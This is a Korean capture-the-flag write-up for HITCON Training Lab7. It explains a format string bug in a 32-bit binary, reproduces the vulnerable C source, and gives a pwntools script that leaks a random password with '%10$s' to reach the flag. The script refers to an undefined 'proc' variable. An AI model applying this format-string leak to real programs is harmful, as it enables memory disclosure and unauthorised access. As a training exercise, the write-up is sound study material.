[HITCON TRAINING] LAB7

[HITCON TRAINING] LAB7 → WRITE UP

먼저 해당 바이너리의 보호기법을 확인해본다.

해당 바이너리는 인텔 기반의 32비트 바이너리이며

보호기법(mitgation)으로는 Stack Canary와 NX bit가 적용되어 있는 것으로 확인된다.

해당 바이너리의 소스코드를 확인해보자.

#include <stdio.h> #include <unistd.h> #include <time.h> #include <stdlib.h> unsigned int password ; int main(){ setvbuf(stdout,0,2,0); char buf[100]; char input[16]; int fd ; srand(time(NULL)); fd = open("/dev/urandom",0); read(fd,&password,4); printf("What your name ? "); read(0,buf,99); printf("Hello ,"); printf(buf); printf("Your password :"); read(0,input,15); if(atoi(input) != password){ puts("Goodbyte"); }else{ puts("Congrt!!"); system("cat /home/crack/flag"); } }

해당 바이너리의 소스코드를 확인해본 결과 입력받는 버퍼의 크기가 입력 길이보다 크기 때문에 

Buffer Over Flow 취약점은 발생하지 않을 것으로 확인된다.

하지만 Line 25에서 입력받은 버퍼 그대로를 printf(buf); 와 같은형태로 출력하고 있기 때문에 

포맷 스트링 버그(Format String Bug)가 발생할 것으로 예상된다.

서식문자를 버퍼에 입력했을 경우 다음과 같은 양상을 보이는 것으로 확인된다.

더나아가 첫번째 입력한 값을 10번째 offset에서 확인할 수 있다.

포맷스트링 버그가 발생하는 것을 확인하였으므로 서식문자 %s를 언급하고자 한다.

서식문자 %s는 해당 주소를 참조하여 해당 주소가 가지고 있는 값을 문자열로 출력해주는 형태의 서식 문자이다.

결론적으로 서식문자 %s를 통해서 전역변수 password 공간의 데이터를 출력할 수 있다는 이야기이다.

이를 기반으로 페이로드를 작성해보자.

#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * p = process("./crack") password_addr = 0x804a048 p.recvuntil("?") p.sendline(p32(password_addr) + "|" + "%10$s" + "|" ) p.recvuntil("|") password = proc.recvuntil("|") password = u32(password[:4]) p.recvuntil(":") p.sendline(str(password)) p.interactive()

참고로 "%10$s" 해당 서식문자는 바로 10번째 offset에 대한 출력을 의미한다.

해당 페이로드를 실행하면

다음과 같이 플래그 파일을 확인하려는 루틴이 실행된 것을 볼수있다.